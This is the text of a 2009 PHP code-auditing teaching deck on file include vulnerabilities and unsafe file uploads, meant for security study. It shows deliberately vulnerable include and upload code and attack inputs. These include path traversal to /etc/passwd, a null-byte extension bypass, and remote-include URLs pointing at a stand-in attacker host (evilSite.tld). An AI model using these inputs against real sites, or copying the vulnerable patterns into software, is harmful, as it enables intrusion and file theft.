©2009 justin c. klein keane php code auditing session 4.2 – file include vulnerabilities justin...

©2009 Justin C. Klein Keane

PHP Code Auditing

Session 4.2 – File Include VulnerabilitiesJustin C. Klien Keane

[email protected]


File Include Vulnerabilities

Arbitrary file includes (reading) Local file includes Remote file includes

Directory traversal Writing arbitrary files


Basic PHP File Includes

Four common functions include()

include_once()

require()

require_once()

Difference is that require will die (with fatal E_ERROR) if the specified file is not found

Include() will produce an E_WARNING _once functions will not re-include the file if it has

already been called


How Includes Work

When PHP includes a file it will parse any PHP code within that file

Anything not delimited with the PHP delimiters (“<?php” and “?>”) will be treated as plain text

Plain text will simply be rendered inline


Typical Include

<?php

include_once('header.php');

include_once($_GET['action'] . '.php');

include_once('footer.php');

?>


Problems with Includes

Arbitrary local file includes triggered via malicious user input:

<?phpinclude_once('inc/'.$_GET['action']);

?>

If user supplies “../../../../../../../etc/passwd” as the 'action' URL variable that file will be rendered during page display!


Incorrect Projection Schemes

Some programmers will append a file extension to attempt to limit includes like /etc/passwd

<?phpinclude('inc/'.$_GET['action'].'.php');

?>

This fails for several reasons, one is because PHP is written in C


Caveats of C

C doesn't have a string type

Instead strings are null terminated character arrays:char foo[3];int main() {

foo[0] = 'B';foo[1] = 'A';foo[2] = 'R';foo[3] = '\0';

}

Without the null at the end the “string” would have no end

C reads from the start of the string until it reaches the null character when printing strings


Tricking PHP with C Conventions

Using a null character triggers C constructs and defeats the prior example

If user passes in:action=../../../../../../etc/passwd%00

then PHP executes:include('inc/../.././../../etc/passwd');

Because PHP terminates the string at the null bit (and ignores the appended '.php')

Most PHP programmers are unaware of this!


Other Include Strategies

There are other ways around extension protections

<?phpinclude('inc/'.$_GET['action'].'.php');

?>

Attacker can provide the GET var:?action=/path/to/other/php_file.php?

renders the final “.php” as a GET var to the included php_file.php


Other Dangers of Includes

Often times include files are meant to be included

Include files live on the filesystem though May contain vulnerabilities when called directly

as variables could be redefined or arbitrarily defined

Especially dangerous when register_globals is on!


Example

Main file:<?php

$style_dir='images/';include_once('header.php');

[...]

Include file:<html><head>

<title>Foo Site</title><style type=”text/css”>

@import url(“<?php echo $style_dir;?>style.css”);</head><body>

What happens when an attacker calls:http://sitename.tld/header.php?style_dir=http://myEvilSite.tld/css/


Remote File Include

Rather than specifying a local resource, an attacker could specify a remote file for inclusion

Remote files must be served as plain text, rather than compiled PHP

Remote text is pulled for inclusion then the local PHP compiler interprets the text, rendering the PHP locally


Remote File Include Requirements

/etc/php.ini has parameters that define the ability of PHP to include files:

;;;;;;;;;;;;;;;;;;; Fopen wrappers ;;;;;;;;;;;;;;;;;;;

; Whether to allow the treatment of URLs (like http:// orftp://) as files.

allow_url_fopen = On


If allow_url_fopen is On

Attackers can include remote files:

<?phpinclude_once($_GET['action'] . '.php');

?>

Attacker can call

?action=http://evilSite.tld/evil_script.txt?


Other Include Strategies

Attackers can use includes to bypass direct access restrictions such as .htaccess

This could be used to expose files like config.ini files Attackers can include Apache files like .htpasswd

or .htaccess files which are included as plain text, exposing their contents

Attackers can subvert program flow by calling files that are normally not included

Attackers can call files readable by Apache, such as files in /tmp which may contain sensitive data (like session cookies or malicious uploads)


Writing Files

PHP functionality used to write files include: File upload functions built into an application

(such as image uploads) Utilizing PHP filesystem commands such as

fwrite()


Typical Image Upload Handler

$upload_dir = "files/";$filename = basename($_FILES['form_filename']['name']);

$target = $upload_dir . $filename;

if(move_uploaded_file($_FILES['form_filename']['tmp_name'], $target)) { echo $filename . " has been uploaded";} else{

echo "Error uploading file!";}


Common Upload Errors

Collisions cause overwrites File type is not checked

Programmer may assume only image files are being uploaded, but this isn't enforced

File type is checked inappropriately Simply checking $_FILES['upload_file']['type'] is

insufficient since this is a browser provided parameter

Double extensions (and programmer only check the first one)


Exploits for File Uploads

Attacker uploads a PHP file which contains a backdoor or exposes other system files

Attacker uploads a .htaccess file overwriting Apache rules

Attacker overwrites existing files to insert a backdoor


Fwrite()

The fwrite() function is a built in function that allows Apache to write to file handles

Often used in installers to write config files Also commonly used for logging For more information see:

http://us3.php.net/manual/en/function.fwrite.php

©2009 justin c. klein keane php code auditing session 4.2 – file include vulnerabilities justin...

Documents

klein keane file

remote file

local file

specified file

klein keane basic php

vulnerabilities arbitrary

vulnerabilities justin

klien keane